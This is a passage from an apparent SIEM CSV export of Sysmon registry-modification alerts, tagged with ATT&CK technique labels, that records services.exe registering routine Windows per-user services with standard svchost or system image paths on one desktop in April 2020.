service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T13:22:07.831714000Z"",""eventRecordID"":""1109"",""processID"":""2168"",""threadID"":""3212"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 13:22:07.733\r\nProcessGuid: {df9fc3d3-e7f5-5ea2-0000-001012a70000}\r\nProcessId: 584\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\DevicePickerUserSvc_42bf6\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k DevicesFlow\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 13:22:07.733"",""processGuid"":""{df9fc3d3-e7f5-5ea2-0000-001012a70000}"",""processId"":""584"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\DevicePickerUserSvc_42bf6\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k DevicesFlow""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 13:22:07.733 +ProcessGuid: {df9fc3d3-e7f5-5ea2-0000-001012a70000} +ProcessId: 584 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\DevicePickerUserSvc_42bf6\ImagePath +Details: C:\Windows\system32\svchost.exe -k DevicesFlow""" +"Apr 24, 2020 @ 13:22:15.475",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T13:22:07.831398200Z"",""eventRecordID"":""1108"",""processID"":""2168"",""threadID"":""3212"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 13:22:07.733\r\nProcessGuid: {df9fc3d3-e7f5-5ea2-0000-001012a70000}\r\nProcessId: 584\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\DevicePickerUserSvc_42bf6\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 13:22:07.733"",""processGuid"":""{df9fc3d3-e7f5-5ea2-0000-001012a70000}"",""processId"":""584"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\DevicePickerUserSvc_42bf6\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 13:22:07.733 +ProcessGuid: {df9fc3d3-e7f5-5ea2-0000-001012a70000} +ProcessId: 584 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\DevicePickerUserSvc_42bf6\Start +Details: DWORD (0x00000003)""" +"Apr 24, 2020 @ 13:22:15.426",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T13:22:07.829992100Z"",""eventRecordID"":""1107"",""processID"":""2168"",""threadID"":""3212"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 13:22:07.733\r\nProcessGuid: {df9fc3d3-e7f5-5ea2-0000-001012a70000}\r\nProcessId: 584\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\DeviceAssociationBrokerSvc_42bf6\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k DevicesFlow -p\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 13:22:07.733"",""processGuid"":""{df9fc3d3-e7f5-5ea2-0000-001012a70000}"",""processId"":""584"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\DeviceAssociationBrokerSvc_42bf6\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k DevicesFlow -p""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 13:22:07.733 +ProcessGuid: {df9fc3d3-e7f5-5ea2-0000-001012a70000} +ProcessId: 584 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\DeviceAssociationBrokerSvc_42bf6\ImagePath +Details: C:\Windows\system32\svchost.exe -k DevicesFlow -p""" +"Apr 24, 2020 @ 13:22:15.304",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T13:22:07.829538900Z"",""eventRecordID"":""1106"",""processID"":""2168"",""threadID"":""3212"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 13:22:07.733\r\nProcessGuid: {df9fc3d3-e7f5-5ea2-0000-001012a70000}\r\nProcessId: 584\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\DeviceAssociationBrokerSvc_42bf6\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 13:22:07.733"",""processGuid"":""{df9fc3d3-e7f5-5ea2-0000-001012a70000}"",""processId"":""584"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\DeviceAssociationBrokerSvc_42bf6\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 13:22:07.733 +ProcessGuid: {df9fc3d3-e7f5-5ea2-0000-001012a70000} +ProcessId: 584 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\DeviceAssociationBrokerSvc_42bf6\Start +Details: DWORD (0x00000003)""" +"Apr 24, 2020 @ 13:22:15.230",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T13:22:07.827314200Z"",""eventRecordID"":""1105"",""processID"":""2168"",""threadID"":""3212"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 13:22:07.733\r\nProcessGuid: {df9fc3d3-e7f5-5ea2-0000-001012a70000}\r\nProcessId: 584\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\CredentialEnrollmentManagerUserSvc_42bf6\\ImagePath\r\nDetails: C:\\Windows\\system32\\CredentialEnrollmentManager.exe\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 13:22:07.733"",""processGuid"":""{df9fc3d3-e7f5-5ea2-0000-001012a70000}"",""processId"":""584"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\CredentialEnrollmentManagerUserSvc_42bf6\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\CredentialEnrollmentManager.exe""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 13:22:07.733 +ProcessGuid: {df9fc3d3-e7f5-5ea2-0000-001012a70000} +ProcessId: 584 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\CredentialEnrollmentManagerUserSvc_42bf6\ImagePath +Details: C:\Windows\system32\CredentialEnrollmentManager.exe""" +"Apr 24, 2020 @ 13:22:15.212",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T13:22:07.827021100Z"",""eventRecordID"":""1104"",""processID"":""2168"",""threadID"":""3212"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 13:22:07.733\r\nProcessGuid: {df9fc3d3-e7f5-5ea2-0000-001012a70000}\r\nProcessId: 584\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\CredentialEnrollmentManagerUserSvc_42bf6\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 13:22:07.733"",""processGuid"":""{df9fc3d3-e7f5-5ea2-0000-001012a70000}"",""processId"":""584"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\CredentialEnrollmentManagerUserSvc_42bf6\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 13:22:07.733 +ProcessGuid: {df9fc3d3-e7f5-5ea2-0000-001012a70000} +ProcessId: 584 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\CredentialEnrollmentManagerUserSvc_42bf6\Start +Details: DWORD (0x00000003)""" +"Apr 24, 2020 @ 13:22:15.152",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T13:22:07.825820900Z"",""eventRecordID"":""1103"",""processID"":""2168"",""threadID"":""3212"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 13:22:07.733\r\nProcessGuid: {df9fc3d3-e7f5-5ea2-0000-001012a70000}\r\nProcessId: 584\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\ConsentUxUserSvc_42bf6\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k DevicesFlow\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 13:22:07.733"",""processGuid"":""{df9fc3d3-e7f5-5ea2-0000-001012a70000}"",""processId"":""584"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\ConsentUxUserSvc_42bf6\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k DevicesFlow""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 13:22:07.733 +ProcessGuid: {df9fc3d3-e7f5-5ea2-0000-001012a70000} +ProcessId: 584 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\ConsentUxUserSvc_42bf6\ImagePath +Details: C:\Windows\system32\svchost.exe -k DevicesFlow""" +"Apr 24, 2020 @ 13:22:15.072",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T13:22:07.825135900Z"",""eventRecordID"":""1102"",""processID"":""2168"",""threadID"":""3212"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 13:22:07.733\r\nProcessGuid: {df9fc3d3-e7f5-5ea2-0000-001012a70000}\r\nProcessId: 584\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\ConsentUxUserSvc_42bf6\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 13:22:07.733"",""processGuid"":""{df9fc3d3-e7f5-5ea2-0000-001012a70000}"",""processId"":""584"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\ConsentUxUserSvc_42bf6\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 13:22:07.733 +ProcessGuid: {df9fc3d3-e7f5-5ea2-0000-001012a70000} +ProcessId: 584 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\ConsentUxUserSvc_42bf6\Start +Details: DWORD (0x00000003)""" +"Apr 24, 2020 @ 13:22:14.990",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T13:22:07.822186900Z"",""eventRecordID"":""1101"",""processID"":""2168"",""threadID"":""3212"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 13:22:07.733\r\nProcessGuid: {df9fc3d3-e7f5-5ea2-0000-001012a70000}\r\nProcessId: 584\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\CDPUserSvc_42bf6\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k UnistackSvcGroup\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 13:22:07.733"",""processGuid"":""{df9fc3d3-e7f5-5ea2-0000-001012a70000}"",""processId"":""584"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\CDPUserSvc_42bf6\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k UnistackSvcGroup""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 13:22:07.733 +ProcessGuid: {df9fc3d3-e7f5-5ea2-0000-001012a70000} +ProcessId: 584 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\CDPUserSvc_42bf6\ImagePath +Details: C:\Windows\system32\svchost.exe -k UnistackSvcGroup""" +"Apr 24, 2020 @ 13:22:14.971",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T13:22:07.821984700Z"",""eventRecordID"":""1100"",""processID"":""2168"",""threadID"":""3212"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 13:22:07.733\r\nProcessGuid: {df9fc3d3-e7f5-5ea2-0000-001012a70000}\r\nProcessId: 584\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\CDPUserSvc_42bf6\\Start\r\nDetails: DWORD (0x00000002)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 13:22:07.733"",""processGuid"":""{df9fc3d3-e7f5-5ea2-0000-001012a70000}"",""processId"":""584"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\CDPUserSvc_42bf6\\\\Start"",""details"":""DWORD (0x00000002)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 13:22:07.733 +ProcessGuid: {df9fc3d3-e7f5-5ea2-0000-001012a70000} +ProcessId: 584 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\CDPUserSvc_42bf6\Start +Details: DWORD (0x00000002)""" +"Apr 24, 2020 @ 13:22:14.931",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T13:22:07.820838600Z"",""eventRecordID"":""1099"",""processID"":""2168"",""threadID"":""3212"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 13:22:07.733\r\nProcessGuid: {df9fc3d3-e7f5-5ea2-0000-001012a70000}\r\nProcessId: 584\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\cbdhsvc_42bf6\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k ClipboardSvcGroup -p\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 13:22:07.733"",""processGuid"":""{df9fc3d3-e7f5-5ea2-0000-001012a70000}"",""processId"":""584"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\cbdhsvc_42bf6\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k ClipboardSvcGroup -p""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 13:22:07.733 +ProcessGuid: {df9fc3d3-e7f5-5ea2-0000-001012a70000} +ProcessId: 584 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\cbdhsvc_42bf6\ImagePath +Details: C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p""" +"Apr 24, 2020 @ 13:22:14.855",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T13:22:07.820578700Z"",""eventRecordID"":""1098"",""processID"":""2168"",""threadID"":""3212"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 13:22:07.733\r\nProcessGuid: {df9fc3d3-e7f5-5ea2-0000-001012a70000}\r\nProcessId: 584\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\cbdhsvc_42bf6\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 13:22:07.733"",""processGuid"":""{df9fc3d3-e7f5-5ea2-0000-001012a70000}"",""processId"":""584"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\cbdhsvc_42bf6\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 13:22:07.733 +ProcessGuid: {df9fc3d3-e7f5-5ea2-0000-001012a70000} +ProcessId: 584 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\cbdhsvc_42bf6\Start +Details: DWORD (0x00000003)""" +"Apr 24, 2020 @ 13:22:14.818",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T13:22:07.819585300Z"",""eventRecordID"":""1097"",""processID"":""2168"",""threadID"":""3212"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 13:22:07.716\r\nProcessGuid: {df9fc3d3-e7f5-5ea2-0000-001012a70000}\r\nProcessId: 584\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\CaptureService_42bf6\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k LocalService -p\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 13:22:07.716"",""processGuid"":""{df9fc3d3-e7f5-5ea2-0000-001012a70000}"",""processId"":""584"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\CaptureService_42bf6\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k LocalService -p""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 13:22:07.716 +ProcessGuid: {df9fc3d3-e7f5-5ea2-0000-001012a70000} +ProcessId: 584 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\CaptureService_42bf6\ImagePath +Details: C:\Windows\system32\svchost.exe -k LocalService -p""" +"Apr 24, 2020 @ 13:22:14.778",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T13:22:07.819288700Z"",""eventRecordID"":""1096"",""processID"":""2168"",""threadID"":""3212"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 13:22:07.716\r\nProcessGuid: {df9fc3d3-e7f5-5ea2-0000-001012a70000}\r\nProcessId: 584\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\CaptureService_42bf6\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 13:22:07.716"",""processGuid"":""{df9fc3d3-e7f5-5ea2-0000-001012a70000}"",""processId"":""584"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\CaptureService_42bf6\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 13:22:07.716 +ProcessGuid: {df9fc3d3-e7f5-5ea2-0000-001012a70000} +ProcessId: 584 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\CaptureService_42bf6\Start +Details: DWORD (0x00000003)""" +"Apr 24, 2020 @ 13:22:14.749",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T13:22:07.794367300Z"",""eventRecordID"":""1095"",""processID"":""2168"",""threadID"":""3212"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 13:22:07.702\r\nProcessGuid: {df9fc3d3-e7f5-5ea2-0000-001012a70000}\r\nProcessId: 584\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\BluetoothUserService_42bf6\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k BthAppGroup -p\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 13:22:07.702"",""processGuid"":""{df9fc3d3-e7f5-5ea2-0000-001012a70000}"",""processId"":""584"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\BluetoothUserService_42bf6\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k BthAppGroup -p""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 13:22:07.702 +ProcessGuid: {df9fc3d3-e7f5-5ea2-0000-001012a70000} +ProcessId: 584 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\BluetoothUserService_42bf6\ImagePath +Details: C:\Windows\system32\svchost.exe -k BthAppGroup -p""" +"Apr 24, 2020 @ 13:22:14.715",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T13:22:07.793980000Z"",""eventRecordID"":""1094"",""processID"":""2168"",""threadID"":""3212"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 13:22:07.702\r\nProcessGuid: {df9fc3d3-e7f5-5ea2-0000-001012a70000}\r\nProcessId: 584\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\BluetoothUserService_42bf6\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 